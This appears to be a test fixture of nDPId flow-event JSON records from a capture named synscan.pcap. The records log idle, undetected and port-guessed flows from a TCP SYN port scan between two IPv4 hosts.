-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":351,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058780,"flow_last_seen":1278275058780,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3476,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1380,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060591,"flow_last_seen":1278275060591,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":38292,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1380,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060591,"flow_last_seen":1278275060591,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":38292,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":392,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058905,"flow_last_seen":1278275058905,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3476,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":392,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058905,"flow_last_seen":1278275058905,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3476,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00652{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":181,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058280,"flow_last_seen":1278275058280,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1433,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":181,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058280,"flow_last_seen":1278275058280,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1651,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060904,"flow_last_seen":1278275060904,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":13722,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1651,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060904,"flow_last_seen":1278275060904,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":13722,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1288,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060438,"flow_last_seen":1278275060438,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":44442,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1288,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060438,"flow_last_seen":1278275060438,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":44442,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00653{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1777,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061107,"flow_last_seen":1278275061107,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1434,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1777,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061107,"flow_last_seen":1278275061107,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1434,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00652{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":234,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058406,"flow_last_seen":1278275058406,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1433,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":234,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058406,"flow_last_seen":1278275058406,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1433,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1362,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060540,"flow_last_seen":1278275060540,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":44442,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1362,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060540,"flow_last_seen":1278275060540,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":44442,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00653{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1880,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061212,"flow_last_seen":1278275061212,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1434,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"MsSQL-TDS","breed":"Acceptable","category":"Database"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1880,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061212,"flow_last_seen":1278275061212,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1434,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1720,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061006,"flow_last_seen":1278275061006,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":13722,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1720,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061006,"flow_last_seen":1278275061006,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":13722,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":919,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059896,"flow_last_seen":1278275059896,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":44443,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":919,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059896,"flow_last_seen":1278275059896,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":44443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":978,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060005,"flow_last_seen":1278275060005,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":44443,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":978,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060005,"flow_last_seen":1278275060005,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":44443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1335,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060493,"flow_last_seen":1278275060493,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":56737,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1335,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060493,"flow_last_seen":1278275060493,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":56737,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1643,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060903,"flow_last_seen":1278275060903,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":56738,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1643,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060903,"flow_last_seen":1278275060903,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":56738,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1410,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060596,"flow_last_seen":1278275060596,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":56737,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1410,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060596,"flow_last_seen":1278275060596,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":56737,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1728,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061006,"flow_last_seen":1278275061006,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":56738,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1728,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061006,"flow_last_seen":1278275061006,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":56738,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":997,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060006,"flow_last_seen":1278275060006,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1443,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":997,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060006,"flow_last_seen":1278275060006,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1050,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060115,"flow_last_seen":1278275060115,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1443,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1050,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060115,"flow_last_seen":1278275060115,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":336,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058721,"flow_last_seen":1278275058721,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3493,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":336,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058721,"flow_last_seen":1278275058721,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3493,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":366,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058845,"flow_last_seen":1278275058845,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3493,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":366,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058845,"flow_last_seen":1278275058845,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3493,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1254,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060389,"flow_last_seen":1278275060389,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5544,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1254,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060389,"flow_last_seen":1278275060389,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5544,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1306,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060490,"flow_last_seen":1278275060490,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5544,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1306,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060490,"flow_last_seen":1278275060490,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5544,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1621,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060900,"flow_last_seen":1278275060900,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5550,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 